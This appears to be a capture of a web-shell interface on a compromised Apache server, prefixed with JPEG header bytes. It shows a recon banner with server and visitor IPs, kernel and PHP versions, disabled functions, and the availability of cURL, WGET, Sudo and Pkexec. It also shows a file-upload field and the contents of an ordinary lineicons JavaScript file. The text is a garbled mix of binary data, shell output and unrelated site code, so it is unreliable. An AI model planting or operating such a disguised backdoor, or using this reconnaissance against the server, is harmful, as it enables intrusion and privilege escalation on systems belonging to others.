����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 216.73.216.68 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /proc/self/root/proc/thread-self/root/var/www/html/rockyo/assets/lineicons/ |
Upload File : |
/* Use this script if you need to support IE 7 and IE 6. */ window.onload = function() { function addIcon(el, entity) { var html = el.innerHTML; el.innerHTML = '<span style="font-family: \'linecons\'">' + entity + '</span>' + html; } var icons = { 'li_heart' : '', 'li_cloud' : '', 'li_star' : '', 'li_tv' : '', 'li_sound' : '', 'li_video' : '', 'li_trash' : '', 'li_user' : '', 'li_key' : '', 'li_search' : '', 'li_settings' : '', 'li_camera' : '', 'li_tag' : '', 'li_lock' : '', 'li_bulb' : '', 'li_pen' : '', 'li_diamond' : '', 'li_display' : '', 'li_location' : '', 'li_eye' : '', 'li_bubble' : '', 'li_stack' : '', 'li_cup' : '', 'li_phone' : '', 'li_news' : '', 'li_mail' : '', 'li_like' : '', 'li_photo' : '', 'li_note' : '', 'li_clock' : '', 'li_paperplane' : '', 'li_params' : '', 'li_banknote' : '', 'li_data' : '', 'li_music' : '', 'li_megaphone' : '', 'li_study' : '', 'li_lab' : '', 'li_food' : '', 'li_t-shirt' : '', 'li_fire' : '', 'li_clip' : '', 'li_shop' : '', 'li_calendar' : '', 'li_vallet' : '', 'li_vynil' : '', 'li_truck' : '', 'li_world' : '' }, els = document.getElementsByTagName('*'), i, attr, html, c, el; for (i = 0; i < els.length; i += 1) { el = els[i]; attr = el.getAttribute('data-icon'); if (attr) { addIcon(el, attr); } c = el.className; c = c.match(/li_[^\s'"]+/); if (c && icons[c[0]]) { addIcon(el, icons[c[0]]); } } };